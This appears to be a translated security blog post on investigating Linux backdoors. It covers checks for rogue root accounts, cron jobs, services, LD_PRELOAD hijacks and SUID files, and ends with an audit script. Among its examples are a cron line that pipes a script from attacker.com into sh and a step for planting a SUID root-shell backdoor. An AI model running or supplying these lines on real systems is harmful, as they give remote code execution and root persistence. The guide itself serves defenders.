1. Common Backdoors
Classification of Common Backdoor Types:
| Type | Platform | Characteristics |
|---|---|---|
| Account Backdoor | Linux/Windows | Creates hidden users or escalates privileges |
| Scheduled Task Backdoor | Linux/Windows | Uses cron / Task Scheduler to execute malicious programs |
| Startup Item Backdoor | Windows/Linux | Writes to startup items for persistence |
| Dynamic Link Library Hijacking | Linux/Windows | LD_PRELOAD / DLL injection |
| Process Injection Backdoor | Linux/Windows | Injects shellcode into legitimate processes |
| Web Memory Horse | Web Application | Memory-resident without landing, hard to detect |
| Rootkit | Linux/Windows | Hides files, processes, network connections, etc. |
2. Detailed Investigation of Linux System Backdoors
1. Account Backdoor Investigation
(1) Check for multiple superusers with UID=0
awk -F: '$3==0 {print $1}' /etc/passwd
- Normally, it should only output
<span>root</span>. - If other usernames appear (e.g.,
<span>backdoor</span>), it indicates that a privileged account has been added.

(2) Check the encrypted password fields in the Shadow file
grep '^\(root\|.*\$)' /etc/shadow
- Check if any non-root users are using
<span>$1$</span>(MD5) or<span>$6$</span>(SHA-512) encrypted passwords. - Abnormal situation: Users with empty passwords are allowed local login but prohibited from remote SSH login.

(3) Disable suspicious accounts
usermod -L username # Lock the account
userdel -r username # Delete the account and its home directory
2. Command History Analysis (Traceback)
(1) View the command history of the current user
history

(2) Enhance history logging (defensive configuration)
Edit <span>/etc/profile</span>, and add the following content:
########## Enhance History Logging ##########
USER_IP=$(who -u am i 2>/dev/null | awk '{print $NF}' | sed -e 's/[()]//g')
if [ "$USER_IP" = "" ]; then
USER_IP=$(hostname)
fi
export HISTTIMEFORMAT="%F %T $USER_IP $(whoami) "
shopt -s histappend
export PROMPT_COMMAND="history -a"
########## End ##########
(3) Clear command history (emergency operation)
history -c> ~/.bash_history
3. Scheduled Task Backdoor Investigation
(1) Check system-level scheduled tasks (crontab)
# View system cron configuration
cat /etc/crontab
ls /etc/cron.d/
ls /etc/cron.{hourly,daily,weekly,monthly}
# Check each user's crontab
for user in $(cut -f1 -d: /etc/passwd); do
echo "=== Crontab for $user ==="
crontab -u $user -l 2>/dev/null
done

(2) Common malicious cron examples
* * * * * /tmp/.malicious.sh
*/5 * * * * curl http://attacker.com/sh | sh
(3) Remove abnormal tasks
crontab -e # Edit current user tasks
crontab -u username -r # Delete all tasks for specified user
4. Startup Items and Service Backdoor Investigation
(1) SysVinit System (Old Version)
chkconfig --list | grep 3:on
(2) Systemd System (Mainstream)
systemctl list-unit-files --type=service | grep enabled

(3) Find custom service files
find /etc/systemd/system/ -name "*.service" -exec cat {} \;

5. Dynamic Link Library Preloading Backdoor (LD_PRELOAD)
Principle
By setting the environment variable <span>LD_PRELOAD</span>, malicious <span>.so</span> files are loaded to hijack standard functions (e.g., <span>getuid</span>, <span>fopen</span>).
Investigation Methods
(1) Check for abnormal <span>/etc/ld.so.preload</span>
cat /etc/ld.so.preload
- Normally, this file should not exist or be empty.
- If it exists and points to a
<span>.so</span>file, it is likely a backdoor.

(2) Use <span>strace</span> to trace dynamic library loading
strace -e trace=openat,execve ls 2>&1 | grep '\.so'
(3) Check if environment variables have been tampered with
env | grep LD_PRELOAD
ps aux | grep -i preload
6. SUID Privilege Escalation Backdoor
Principle
Sets executable files with SUID permissions to run as the owner.
Implanting a Backdoor
cp /bin/bash /tmp/nf
chmod +s /tmp/nf
Exploitation:
/tmp/nf -p # Get root shell
Investigation Command
find / -perm -4000 -type f -exec ls -ldb {} \; 2>/dev/null

Key Focus:
- SUID programs in non-official paths (e.g.,
<span>/tmp</span>,<span>/dev/shm</span>) - SUID programs not owned by root
Removal
chmod -s /tmp/nfrm /tmp/nf
3. Comprehensive Investigation Script (Linux)
#!/bin/bashecho "========== Comprehensive System Backdoor Investigation Script =========="
echo "[+] 1. Check privileged users"
awk -F: '$3==0 {print $1}' /etc/passwd
echo "[+] 2. Check remote login accounts"
grep '\$6\$' /etc/shadow | cut -d: -f1
echo "[+] 3. Check sudo permission users"
grep "ALL=(ALL)" /etc/sudoers /etc/sudoers.d/* 2>/dev/null
echo "[+] 4. Check scheduled tasks"
(crontab -l 2>/dev/null; echo; for u in $(cut -f1 -d: /etc/passwd); do crontab -u $u -l 2>/dev/null; done)
echo "[+] 5. Check startup services"
systemctl list-unit-files --type=service | grep enabled
echo "[+] 6. Check SUID files"
find / -perm -4000 -type f -exec ls -ldb {} \; 2>/dev/null | head -20
echo "[+] 7. Check LD_PRELOAD and /etc/ld.so.preload"
cat /etc/ld.so.preload 2>/dev/null || echo "Not found"
env | grep LD_PRELOAD
echo "[+] 8. Check abnormal network connections"
netstat -antlp | grep ESTABLISHED
echo "[+] 9. Check recently modified files (last 1 day)"
find /tmp /var/tmp /dev/shm -mtime -1 -type f -exec ls -la {} \;
echo "[+] 10. Check .bash_history"
head ~/.bash_history
echo "========================================"
Save as <span>backdoor_check.sh</span> and execute:
chmod +x backdoor_check.sh
./backdoor_check.sh > report.txt
Internal team knowledge link is as follows, with discounts available~

Previous Recommendations
Dictionary Generation Tool “Flash Purple”, AI-assisted generation effect, welcomes major update v1.1.1!
[Practical SRC] Vulnerability Mining Case of XSS Vulnerability